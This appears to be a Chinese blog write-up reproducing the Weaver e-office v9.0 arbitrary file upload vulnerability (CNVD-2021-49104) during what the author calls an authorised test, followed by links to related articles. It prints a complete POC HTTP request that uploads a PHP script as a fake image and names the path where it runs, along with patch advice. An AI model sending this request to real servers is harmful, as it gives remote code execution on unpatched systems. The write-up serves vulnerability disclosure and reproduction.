漏洞描述

泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

【授权】真实环境复现

朴实无华的周二,枯燥地做着渗透项目,突然信息收集到OA系统,兴致来了,所以简单记录一下。
访问主页,就是这样一个页面,经典的泛微OA。


前不久,印象中是上周吧,看到泛微出了新漏洞,泛微 e-office v9.0有任意文件上传。直接试着payload打一下,碰碰运气:

POC

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:(IP):端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 195
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="1.php"
Content-Type: image/jpeg<?php phpinfo();?>--e64bdf16c554bbc109cecef6451c26a4--

结果


成功执行。访问漏洞url:
/images/logo/logo-eoffice.php

漏洞修复

打补丁,官网已提供:

http://v10.e-office.cn/eoffice9update/safepack.zip

(CNVD-2021-49104) 泛微E-Office v9.0任意文件上传漏洞相关推荐

  1. 泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

    文章来源|MS08067 Web安全知识星球 本文作者:Taoing(Web漏洞挖掘班讲师) 参考: https://cnvd.org.cn/flaw/show/CNVD-2021-49104 htt ...

  2. 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

    0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...

  3. 泛微 e-office v9.0任意文件上传漏洞{CNVD-2021-49104}

    目录 漏洞介绍 影响版本 漏洞环境 漏洞复现一 漏洞复现二 修复方法

  4. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  5. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  6. 泛微E-Office文件上传漏洞(CNVD-2021-49104)

    泛微E-Office文件上传漏洞(CNVD-2021-49104) 漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台.由于 e-office 未能正确处理上传模块中的用户输入,攻击者 ...

  7. (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

    漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...

  8. 泛微任意文件上传(CNVD-2021-49104)

    CNVD-2021-49104 goby exp 声明 代码 poc集合 声明 本程序仅供于学习交流,请使用者遵守<中华人民共和国网络安全法>,勿将此脚本用于非授权的测试,脚本开发者不负任 ...

  9. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  10. Feng Office 3.7.0.5 - 文件上传

    Feng Office 3.7.0.5 - 文件上传 <?php$exp = explode("/", $_SERVER['REQUEST_URI']);$iname = $ ...

最新文章

  1. 肝了十几个小时的java反射,希望对大家有所帮助吧!
  2. 【每日SQL打卡】​​​​​​​​​​​​​​​DAY 21丨报告系统状态的连续日期【难度困难】​
  3. Qt的工程文件讲解 .pro
  4. Python Tricks(十三)—— 欧几里得算法
  5. 嵌入式系统——RS232和RS449
  6. ubuntu 启动进入initramfs错误解决办法
  7. win10 打开注册表
  8. PingFang SC 字体
  9. java基于ssm+mysql的宠物店管理系统 计算机毕业设计
  10. 齐岳|马钱苷酸小麦麦清白蛋白纳米粒|雷公藤红素乳清白蛋白纳米粒Celastrol-whey protein
  11. 用Actix写的一个类似于Facemash的小项目总结
  12. 解决windows2003 sp1“数据执行保护”惹的祸
  13. mongoose populate 填充
  14. i5处理器做java够用吗,一般的游戏玩家用i5处理器就够了,这是真的吗?
  15. 【Hyperledger Fabric入门】(一) 快速运行一个简单的Fabric网络2
  16. 帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
  17. 网络安全学习第6篇 - 爆破及PE文件解释
  18. OpenCv 在Win7台式机上的摄像头无法拍照
  19. 开发一个全功能的 Word Add-in
  20. 服务器put请求获取不到参数

热门文章

  1. 华为是怎样研发的(12)——FMEA分析
  2. sim800a指令_SIM800A模块进行HTTP的GET和POST操作
  3. Arduino+sim800 gsm收发短信
  4. 老男孩Python 第7期 老男孩Python培训视频教程
  5. JavaScript 中级篇:模块化编程
  6. sae nodejs mysql_通过新浪云部署NideShop微信小程序商城(基于Node.js+MySQL+ThinkJS)
  7. 一二线城市知名 IT 互联网公司名单(新版)
  8. 实车开放道路真体验,开启车联网发展新征程
  9. 交通行业如何做好数字化转型?| 推荐收藏
  10. 我很忙,我没有时间,所以我无法成为更有价值的人